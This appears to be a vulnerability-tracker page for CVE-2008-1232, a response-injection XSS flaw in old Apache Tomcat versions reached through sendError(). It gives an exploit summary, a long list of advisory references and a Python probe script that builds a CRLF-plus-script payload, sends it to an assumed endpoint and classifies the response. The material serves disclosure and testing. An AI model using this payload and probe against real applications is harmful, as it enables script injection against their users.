CVE-2008-1232

Apache Tomcat 4.1.0-4.1.37, 5.5.0-5.5.26, 6.0.0-6.0.16 - Cross-Site Scripting via HttpServletResponse.sendError

Title source: llm

Exploitation Summary

EIP tracks 1 public exploit for CVE-2008-1232, a PoC published by Konstantin Kolinko.

AI-analyzed exploit summary: The PoC calls HttpServletResponse.sendError(403, ...) with a message that contains CR and LF (written as Java \u000d\u000a escapes, the "Unicode characters" noted by the analysis) followed by a <script> element. Affected Tomcat versions copy that message, unfiltered, into the reason-phrase of the HTTP status line, so the line breaks terminate the status line and the header block and the script becomes the start of the response body, where it executes in the context of the affected site. This is HTTP response injection through the reason phrase rather than a bypass of input sanitization, and it only works against web applications that pass attacker-controlled data to sendError().

Description

Cross-site scripting (XSS) vulnerability in Apache Tomcat 4.1.0 through 4.1.37, 5.5.0 through 5.5.26, and 6.0.0 through 6.0.16 allows remote attackers to inject arbitrary web script or HTML via a crafted string that is used in the message argument to the HttpServletResponse.sendError method. In the affected versions that message is not only rendered on the error page but also copied, unfiltered, into the reason-phrase of the HTTP status line, where CR and LF are illegal; a message containing them terminates the status line early and lets the remainder be injected as headers or body. Only web applications that call sendError() with user-supplied data are exposed.
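A worked probe for the mechanism described in the summary and the description above, added here as an example; it is not code from this page, from the Exploit-DB entry, or from the Apache Tomcat project. It assumes a hypothetical application endpoint that hands a query parameter straight to sendError(403, ...), and the two sample responses are constructed by hand to show the split and non-split outcomes, not captured from a real server.

```python
import html
import socket
from urllib.parse import quote

# Constructed marker; any string that is easy to spot in a response works.
MARKER = "<script>alert(1)</script>"


def build_message(marker: str = MARKER) -> str:
    """The string an affected application would pass to sendError(403, ...).
    The CR LF CR LF is what matters: once a vulnerable Tomcat copies the
    message verbatim into the reason-phrase, the first CR LF ends the status
    line, the blank line ends the header block, and the marker becomes the
    start of the response body."""
    return "Forbidden\r\n\r\n" + marker


def java_literal(s: str) -> str:
    """Render the message as it looks inside a Java string literal, with CR/LF
    as \\u000d\\u000a escapes (the 'Unicode characters' form of the PoC)."""
    return "".join(
        c if 0x20 <= ord(c) < 0x7F and c not in '"\\' else "\\u%04x" % ord(c)
        for c in s
    )


def probe_path(base_path: str, param: str, marker: str = MARKER) -> str:
    """Request path for a hypothetical endpoint (an assumption, not a Tomcat
    component) that hands `param` to sendError(403, ...). CR/LF are
    percent-encoded so the request line itself stays valid."""
    return f"{base_path}?{param}={quote(build_message(marker), safe='')}"


def fetch_raw(host: str, port: int, path: str, timeout: float = 5.0) -> bytes:
    """Send one GET and return the unparsed response bytes. A raw socket is
    used on purpose: http.client stops at the first line break and could not
    show a split status line."""
    req = f"GET {path} HTTP/1.0\r\nHost: {host}\r\nConnection: close\r\n\r\n"
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(req.encode("ascii"))
        chunks = []
        while True:
            chunk = s.recv(4096)
            if not chunk:
                break
            chunks.append(chunk)
    return b"".join(chunks)


def classify_response(raw: bytes, marker: str = MARKER) -> str:
    """Decide how the marker ended up in a raw HTTP response.
    'split'     injected CR LF CR LF closed the header block: the marker sits
                where the body begins and the server's own headers come after
                it (the CVE-2008-1232 outcome)
    'reflected' marker unescaped in a properly framed body (ordinary reflected
                XSS via the error page, no response splitting)
    'escaped'   marker reached the body HTML-escaped
    'absent'    marker not found"""
    head, _, body = raw.partition(b"\r\n\r\n")
    header_names = {
        line.split(b":", 1)[0].strip().lower()
        for line in head.split(b"\r\n")[1:]
        if b":" in line
    }
    m = marker.encode("latin-1")
    framing_headers = {b"content-type", b"content-length", b"server"}
    if body.startswith(m) and not header_names & framing_headers:
        return "split"
    if m in body:
        return "reflected"
    if html.escape(marker, quote=False).encode("latin-1") in body:
        return "escaped"
    return "absent"


def _tomcat_like_response(reason_phrase: str, message_html: str) -> bytes:
    """Constructed 403 response in the shape of a Tomcat error page."""
    body = f"<html><body><h1>HTTP Status 403 - {message_html}</h1></body></html>".encode("latin-1")
    return (
        f"HTTP/1.1 403 {reason_phrase}\r\n".encode("latin-1")
        + b"Server: Apache-Coyote/1.1\r\n"
        + b"Content-Type: text/html;charset=utf-8\r\n"
        + b"Content-Length: %d\r\n\r\n" % len(body)
        + body
    )


# Constructed: message copied verbatim into the reason phrase (affected
# behaviour). Escaping on the error page does not help, because the injected
# body text arrives before the page does.
VULNERABLE_RESPONSE = _tomcat_like_response(build_message(), html.escape(build_message(), quote=False))

# Constructed: a non-injectable response, fixed reason phrase and the message
# present only HTML-escaped inside the error page.
FIXED_RESPONSE = _tomcat_like_response("Forbidden", html.escape(build_message(), quote=False))


if __name__ == "__main__":
    print("PoC message as a Java literal:", java_literal(build_message()))
    print("constructed vulnerable sample:", classify_response(VULNERABLE_RESPONSE))
    print("constructed fixed sample:", classify_response(FIXED_RESPONSE))
    # Live target (assumed endpoint /app/deny reflecting ?msg= into sendError):
    # print(classify_response(fetch_raw("target.example", 8080, probe_path("/app/deny", "msg"))))
```

The classifier keys on framing rather than on the marker alone: a "split" verdict requires the marker to appear before any of the headers Tomcat always emits, which separates reason-phrase injection from a page that merely reflects the parameter. On the application side the durable fix is the same regardless of Tomcat version: never put user-controlled text in the message argument of sendError().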

Exploits (1)

exploitdb · WORKING POC · VERIFIED
by Konstantin Kolinko · text · remote · multiple
https://www.exploit-db.com/exploits/32138


Classification
Working PoC: 90%
Attack Type: XSS (HTTP response injection through the sendError reason phrase)
Complexity: Trivial
Reliability: Reliable
Target: Apache Tomcat 4.1.0 through 4.1.37, 5.5.0 through 5.5.26, 6.0.0 through 6.0.16
Authentication: none needed
Prerequisites: Access to a vulnerable Apache Tomcat instance · Ability to send crafted HTTP requests · A deployed web application that passes attacker-controlled data to the message argument of sendError(); without such an application the crafted string never reaches the reason phrase
devstral-2 · analyzed Feb 16, 2026

References (64)

Core References (64)
Third Party Advisory vendor-advisory x_refsource_fedora
https://www.redhat.com/archives/fedora-package-announce/2008-September/msg00889.html
Third Party Advisory vendor-advisory x_refsource_fedora
https://www.redhat.com/archives/fedora-package-announce/2008-September/msg00712.html
Third Party Advisory vendor-advisory x_refsource_fedora
https://www.redhat.com/archives/fedora-package-announce/2008-September/msg00859.html
URL Repurposed vdb-entry x_refsource_vupen
http://www.vupen.com/english/advisories/2009/3316
Third Party Advisory, VDB Entry vdb-entry x_refsource_sectrack
http://www.securitytracker.com/id?1020622
Vendor Advisory x_refsource_confirm
http://tomcat.apache.org/security-4.html
Third Party Advisory vendor-advisory x_refsource_redhat
http://www.redhat.com/support/errata/RHSA-2008-0862.html
URL Repurposed vdb-entry x_refsource_vupen
http://www.vupen.com/english/advisories/2009/1609
URL Repurposed vdb-entry x_refsource_vupen
http://www.vupen.com/english/advisories/2009/2194
Broken Link third-party-advisory x_refsource_secunia
http://secunia.com/advisories/34013
URL Repurposed vdb-entry x_refsource_vupen
http://www.vupen.com/english/advisories/2008/2823
Broken Link third-party-advisory x_refsource_secunia
http://secunia.com/advisories/37460
Third Party Advisory x_refsource_confirm
http://www.vmware.com/security/advisories/VMSA-2009-0002.html
Broken Link third-party-advisory x_refsource_secunia
http://secunia.com/advisories/31982
Third Party Advisory, VDB Entry vdb-entry x_refsource_bid
http://www.securityfocus.com/bid/31681
Broken Link third-party-advisory x_refsource_secunia
http://secunia.com/advisories/32120
Third Party Advisory x_refsource_confirm
http://www.vmware.com/security/advisories/VMSA-2009-0016.html
Broken Link third-party-advisory x_refsource_secunia
http://secunia.com/advisories/33999
Exploit, Patch, Third Party Advisory, VDB Entry vdb-entry x_refsource_bid
http://www.securityfocus.com/bid/30496
Broken Link third-party-advisory x_refsource_secunia
http://secunia.com/advisories/31865
Third Party Advisory third-party-advisory x_refsource_sreason
http://securityreason.com/securityalert/4098
Broken Link third-party-advisory x_refsource_secunia
http://secunia.com/advisories/31639
Third Party Advisory vendor-advisory x_refsource_suse
http://lists.opensuse.org/opensuse-security-announce/2008-09/msg00004.html
Broken Link third-party-advisory x_refsource_secunia
http://secunia.com/advisories/36108
Third Party Advisory vendor-advisory x_refsource_mandriva
http://www.mandriva.com/security/advisories?name=MDVSA-2008:188
Broken Link third-party-advisory x_refsource_secunia
http://secunia.com/advisories/31379
Third Party Advisory x_refsource_confirm
http://support.avaya.com/elmodocs2/security/ASA-2008-401.htm
URL Repurposed vdb-entry x_refsource_vupen
http://www.vupen.com/english/advisories/2009/0320
Third Party Advisory, VDB Entry mailing-list x_refsource_bugtraq
http://www.securityfocus.com/archive/1/507985/100/0/threaded
Third Party Advisory vendor-advisory x_refsource_redhat
http://www.redhat.com/support/errata/RHSA-2008-0864.html
Third Party Advisory vendor-advisory x_refsource_suse
http://lists.opensuse.org/opensuse-security-announce/2009-02/msg00002.html
Vendor Advisory x_refsource_confirm
http://tomcat.apache.org/security-6.html
Broken Link third-party-advisory x_refsource_secunia
http://secunia.com/advisories/57126
Broken Link third-party-advisory x_refsource_secunia
http://secunia.com/advisories/32222
Broken Link third-party-advisory x_refsource_secunia
http://secunia.com/advisories/31891
Broken Link third-party-advisory x_refsource_secunia
http://secunia.com/advisories/33797
Third Party Advisory, VDB Entry mailing-list x_refsource_bugtraq
http://www.securityfocus.com/archive/1/505556/100/0/threaded
URL Repurposed vdb-entry x_refsource_vupen
http://www.vupen.com/english/advisories/2008/2305
Third Party Advisory, VDB Entry mailing-list x_refsource_bugtraq
http://www.securityfocus.com/archive/1/504351/100/0/threaded
Vendor Advisory x_refsource_confirm
http://tomcat.apache.org/security-5.html
Broken Link third-party-advisory x_refsource_secunia
http://secunia.com/advisories/35474
URL Repurposed vdb-entry x_refsource_vupen
http://www.vupen.com/english/advisories/2008/2780
Broken Link third-party-advisory x_refsource_secunia
http://secunia.com/advisories/31381
Mailing List, Third Party Advisory vendor-advisory x_refsource_hp
http://marc.info/?l=bugtraq&m=123376588623823&w=2
Mailing List, Third Party Advisory vendor-advisory x_refsource_hp
http://marc.info/?l=bugtraq&m=139344343412337&w=2
Mailing List, Third Party Advisory vendor-advisory x_refsource_apple
http://lists.apple.com/archives/security-announce/2008/Oct/msg00001.html
Third Party Advisory x_refsource_confirm
http://support.apple.com/kb/HT3216
URL Repurposed vdb-entry x_refsource_vupen
http://www.vupen.com/english/advisories/2009/0503
Third Party Advisory, VDB Entry vdb-entry x_refsource_xf
https://exchange.xforce.ibmcloud.com/vulnerabilities/44155
Third Party Advisory, VDB Entry mailing-list x_refsource_bugtraq
http://www.securityfocus.com/archive/1/495021/100/0/threaded
Broken Link third-party-advisory x_refsource_secunia
http://secunia.com/advisories/32266
Third Party Advisory vendor-advisory x_refsource_redhat
http://www.redhat.com/support/errata/RHSA-2008-0648.html

Scores

EPSS 0.3815
EPSS Percentile 97.3%

Details

CWE
CWE-79
Status published
Products (2)
apache/tomcat 4.1.0 - 4.1.37
org.apache.tomcat/tomcat 4.1.0 - 4.1.38 (Maven)
Published Aug 04, 2008
Tracked Since Feb 18, 2026